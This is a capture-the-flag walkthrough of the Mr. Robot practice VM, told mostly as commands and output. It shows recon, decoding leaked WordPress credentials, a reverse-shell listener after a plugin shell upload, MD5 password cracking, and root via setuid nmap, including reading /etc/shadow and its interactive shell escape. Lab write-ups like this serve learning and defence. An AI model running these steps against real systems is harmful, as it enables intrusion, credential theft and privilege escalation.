Description:
Based on the show, Mr. Robot.
This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find.
The VM isn't too difficult. There isn't any advanced exploitation or reverse engineering. The level is considered beginner-intermediate.
Let's go!
```
# Nmap 7.01 scan initiated Mon Jul 4 17:21:13 2016 as: nmap -T5 -p- -oN nmap-mr-robot.txt 192.168.1.134
Nmap scan report for 192.168.1.134
Host is up (0.00028s latency).
Not shown: 65532 filtered ports
PORT    STATE  SERVICE
22/tcp  closed ssh
80/tcp  open   http
443/tcp open   https
MAC Address: 08:00:27:C7:03:E7 (Oracle VirtualBox virtual NIC)

# Nmap done at Mon Jul 4 17:22:08 2016 -- 1 IP address (1 host up) scanned in 54.52 seconds
```
```
# cat nikto.log
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.134
+ Target Hostname:    192.168.1.134
+ Target Port:        80
+ Start Time:         2016-07-04 19:25:00 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/5.5.29
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x29 0x52467010ef8ad
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html, index.php
+ OSVDB-3092: /admin/: This might be interesting...
+ Uncommon header 'link' found, with contents: <http://192.168.1.134/?p=23>; rel=shortlink
+ /readme.html: This WordPress file reveals the installed version.
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /admin/index.html: Admin login page/section found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login/: Admin login page/section found.
+ /wordpress/: A Wordpress installation was found.
+ /wp-admin/wp-login.php: Wordpress login found
+ /blog/wp-login.php: Wordpress login found
+ /wp-login.php: Wordpress login found
+ 7535 requests: 0 error(s) and 18 item(s) reported on remote host
+ End Time:           2016-07-04 19:27:14 (GMT-4) (134 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
```
```
# curl 192.168.1.134/robots.txt
User-agent: *
fsocity.dic
key-1-of-3.txt
```
```
# cat key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9
```
```
# curl 192.168.1.134/license.txt |sort -n

do you want a password or something?
what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?
ZWxsaW90OkVSMjgtMDY1Mgo=

# echo "ZWxsaW90OkVSMjgtMDY1Mgo=" |base64 -d
elliot:ER28-0652
```
We have the WordPress credentials: the base64 string at the end of license.txt decodes to `elliot:ER28-0652`, and nikto already found the login form at /wp-login.php. Once inside, the goal is to get a PHP shell on the server: either upload one packaged as a plugin, or edit an existing PHP file of the active theme through the admin editor.
Here is a ready-made tool that uploads a shell as a plugin: https://github.com/leonjza/wordpress-shell
Once we have a shell (preferably an interactive one) we continue.
```
root@kali:~# nc -lvvp 7788
listening on [any] 7788 ...
192.168.1.134: inverse host lookup failed: Unknown host
connect to [192.168.1.136] from (UNKNOWN) [192.168.1.134] 42727
python -c 'import pty; pty.spawn("/bin/bash")'
daemon@linux:/tmp$ id;uname -a;lsb_release -a
id;uname -a;lsb_release -a
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 14.04.2 LTS
Release:        14.04
Codename:       trusty
daemon@linux:/tmp$
```
```
daemon@linux:/tmp$ ls -alR /home
ls -alR /home
/home:
total 12
drwxr-xr-x  3 root root 4096 Nov 13  2015 .
drwxr-xr-x 22 root root 4096 Sep 16  2015 ..
drwxr-xr-x  2 root root 4096 Jul  5 23:13 robot

/home/robot:
total 20
drwxr-xr-x 2 root  root  4096 Jul  5 23:13 .
drwxr-xr-x 3 root  root  4096 Nov 13  2015 ..
-rw------- 1 root  robot  658 Jul  6 01:45 .bash_history
-r-------- 1 robot robot   33 Nov 13  2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot   39 Nov 13  2015 password.raw-md5
daemon@linux:/tmp$ cat /home/robot/key-2-of-3.txt
cat /home/robot/key-2-of-3.txt
cat: /home/robot/key-2-of-3.txt: Permission denied
daemon@linux:/tmp$ cat /home/robot/password.raw-md5
cat /home/robot/password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
```
As we can see, there are two files: one we cannot read yet, which holds our second key, and a world-readable one with credentials: the user "robot" and a password which, judging by the file name, is stored as a raw (unsalted) MD5 hash, not encrypted.
A simple Google search for the hash leads to: http://md5cracker.org/decrypted-md5-hash/c3fcd3d76192e4007dfb496cca67e13b
The password for "robot" is:
abcdefghijklmnopqrstuvwxyz
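Pasting a hash into a web lookup service leaks it to a third party and only works when the value is already in their table. The same check can be done offline against a wordlist (for instance the fsocity.dic the box advertises in robots.txt). The script below is an added example and not part of the original write-up; the wordlist it builds is constructed for the demo, and the `user:md5hex` line is the real content of password.raw-md5 shown above. It forks one hashing process per candidate, so it is fine for a few thousand words but not a substitute for hashcat or john on large lists.

```shell
#!/bin/sh
# Added example (not from the original write-up): offline dictionary check of
# a "user:md5hex" file, the format of /home/robot/password.raw-md5 on this box.

# md5_hex STRING: lowercase hex MD5 of STRING (the trailing newline is NOT hashed,
# which matters: "abc" and "abc\n" have different digests).
md5_hex() {
    if command -v md5sum >/dev/null 2>&1; then
        printf '%s' "$1" | md5sum | cut -d' ' -f1
    else
        printf '%s' "$1" | openssl dgst -md5 | sed 's/^.* //'
    fi
}

# crack_md5 HASH WORDLIST: print the first candidate in WORDLIST whose MD5 equals
# HASH (hex digits compared case-insensitively); return 1 when nothing matches.
crack_md5() {
    target=$(printf '%s' "$1" | tr 'A-F' 'a-f')
    # "|| [ -n ... ]" keeps a final line that has no trailing newline.
    while IFS= read -r candidate || [ -n "$candidate" ]; do
        if [ "$(md5_hex "$candidate")" = "$target" ]; then
            printf '%s\n' "$candidate"
            return 0
        fi
    done < "$2"
    return 1
}

# crack_raw_md5_file FILE WORDLIST: FILE holds "user:md5hex" lines; print
# "user:password" for every line that cracks, return 1 if none does.
crack_raw_md5_file() {
    status=1
    while IFS=: read -r user hash; do
        [ -n "$hash" ] || continue
        if pw=$(crack_md5 "$hash" "$2"); then
            printf '%s:%s\n' "$user" "$pw"
            status=0
        fi
    done < "$1"
    return $status
}

# Demo on constructed input: the hash is the real one from the box, the
# wordlist is made up here (deduplicate a real one with `sort -u` first).
demo=$(mktemp -d)
printf 'robot:c3fcd3d76192e4007dfb496cca67e13b\n' > "$demo/password.raw-md5"
printf 'password\nelliot\nER28-0652\nabcdefghijklmnopqrstuvwxyz\n' > "$demo/words.txt"
crack_raw_md5_file "$demo/password.raw-md5" "$demo/words.txt"
rm -rf "$demo"
```

The value c3fcd3d76192e4007dfb496cca67e13b is also the RFC 1321 test vector for MD5("abcdefghijklmnopqrstuvwxyz"), which is why any lookup table has it; an unsalted MD5 of a dictionary word offers no protection at all.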
```
daemon@linux:/tmp$ su robot
su robot
Password: abcdefghijklmnopqrstuvwxyz
robot@linux:/tmp$ id
id
uid=1002(robot) gid=1002(robot) groups=1002(robot)
robot@linux:/tmp$ cat /home/robot/key-2-of-3.txt
cat /home/robot/key-2-of-3.txt
822c73956184f694993bede3eb39f959
```
Now for the last one. We look for files with the setuid bit set, since any of them runs with its owner's privileges (root, for most of them) regardless of who invokes it.
```
robot@linux:/tmp$ ls -alt `find / -perm -4000 -type f 2>/dev/null`
-r-sr-xr-x 1 root root  14320 Nov 13  2015 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
-r-sr-xr-x 1 root root   9532 Nov 13  2015 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
-rwsr-xr-x 1 root root 504736 Nov 13  2015 /usr/local/bin/nmap
-rwsr-xr-x 1 root root 155008 Mar 12  2015 /usr/bin/sudo
-rwsr-xr-x 1 root root  10344 Feb 25  2015 /usr/lib/pt_chown
-rwsr-xr-x 1 root root  94792 Feb 12  2015 /bin/mount
-rwsr-xr-x 1 root root  69120 Feb 12  2015 /bin/umount
-rwsr-xr-x 1 root root 440416 May 12  2014 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root  44168 May  7  2014 /bin/ping
-rwsr-xr-x 1 root root  44680 May  7  2014 /bin/ping6
-rwsr-xr-x 1 root root  10240 Feb 25  2014 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root  36936 Feb 17  2014 /bin/su
-rwsr-xr-x 1 root root  32464 Feb 17  2014 /usr/bin/newgrp
-rwsr-xr-x 1 root root  46424 Feb 17  2014 /usr/bin/chfn
-rwsr-xr-x 1 root root  41336 Feb 17  2014 /usr/bin/chsh
-rwsr-xr-x 1 root root  68152 Feb 17  2014 /usr/bin/gpasswd
-rwsr-xr-x 1 root root  47032 Feb 17  2014 /usr/bin/passwd
robot@linux:/tmp$
```
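Reading a listing like the one above by eye works on a CTF box, but the interesting question is always the same: which of these setuid files is a general-purpose tool that can spawn a shell or read arbitrary files, rather than a purpose-built helper like `passwd` or `ping`? The script below is an added example, not part of the original write-up, that automates that triage; the list of "dangerous" names is an assumption of this example (binaries widely documented as giving a shell escape when run setuid-root) and is deliberately short, not exhaustive. The same function is equally useful on the defensive side, as a periodic audit that should return nothing on a well-built host.

```shell
#!/bin/sh
# Added example (not from the original write-up): enumerate setuid files under a
# directory and flag the ones whose name matches a tool known to hand over a root
# shell (or arbitrary file read) when setuid, as /usr/local/bin/nmap does here.

# Assumed list: interpreters, editors, pagers and tools with a shell escape.
# Purpose-built setuid helpers (passwd, su, sudo, ping, mount) are NOT listed;
# they are expected to be setuid and are not shell escapes by themselves.
DANGEROUS_SUID="nmap vim vi find bash sh dash python python2 python3 perl ruby less more awk gawk nano env tar cp"

# list_suid ROOT: every regular file under ROOT with the setuid bit, one per line.
# -xdev keeps the walk on one filesystem; errors (unreadable dirs) are dropped.
list_suid() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null
}

# is_dangerous NAME: succeed if NAME (a basename) is on the assumed list.
is_dangerous() {
    for known in $DANGEROUS_SUID; do
        [ "$1" = "$known" ] && return 0
    done
    return 1
}

# audit_suid ROOT: print the path of each setuid file that is on the list.
# Output is empty when nothing suspicious is found.
audit_suid() {
    list_suid "$1" | while IFS= read -r path; do
        name=$(basename "$path")
        if is_dangerous "$name"; then
            printf '%s\n' "$path"
        fi
    done
}

# Run against a root given on the command line, e.g.:  sh suid_audit.sh /
if [ "$#" -gt 0 ]; then
    audit_suid "$1"
fi
```

On the box above, `audit_suid /` would print only /usr/local/bin/nmap: the nmap binary sits outside the package manager's paths (/usr/local/bin) and carries a setuid bit that no stock Ubuntu package gives it, which is exactly the kind of outlier a defender should alert on.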
From the listing, nmap is setuid root, and a Google search turns up:
http://blog.shellmates.org/2012/09/dont-setuid-nmap.html
https://synfin.net/papers/nmap-suid.txt
> nmap --script <(echo 'os.execute("/bin/sh")') # setuid nmap privesc. Older version? try nmap --interactive @pentestcli
> — Daniel Miller ✝ (@bonsaiviking) November 28, 2012
```
robot@linux:/tmp$ nmap -iL /etc/shadow localhost
nmap -iL /etc/shadow localhost

Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2016-07-06 02:03 UTC
Invalid host expression: root:$6$9xQC1KOf$5cmONytt0VF/wi3Np3jZGRSVzpGj6sXxVHkyJLjV4edlBxTVmW91pcGwAViViSWcAS/.OF0iuvylU5IznY2Re.:16753:0:99999:7::: -- colons only allowed in IPv6 addresses, and then you need the -6 switch
QUITTING!
robot@linux:/tmp$ nmap --interactive
nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !id
!id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
waiting to reap child : No child processes
nmap> !ls /root
!ls /root
firstboot_done  key-3-of-3.txt
waiting to reap child : No child processes
nmap> !cat /root/key-3-of-3.txt
!cat /root/key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
waiting to reap child : No child processes
nmap>
```
Two things are visible here. First, even before interactive mode, `nmap -iL /etc/shadow` makes the setuid binary open a root-only file and echo its first line back in the error message, which leaks root's password hash: a file-read primitive on its own. Second, the `!` command in `--interactive` runs shell commands with `euid=0(root)`, which is what gives us the third key. Interactive mode only exists in old releases such as the 3.81 installed here; on newer versions the NSE `--script` one-liner from the tweet above achieves the same thing.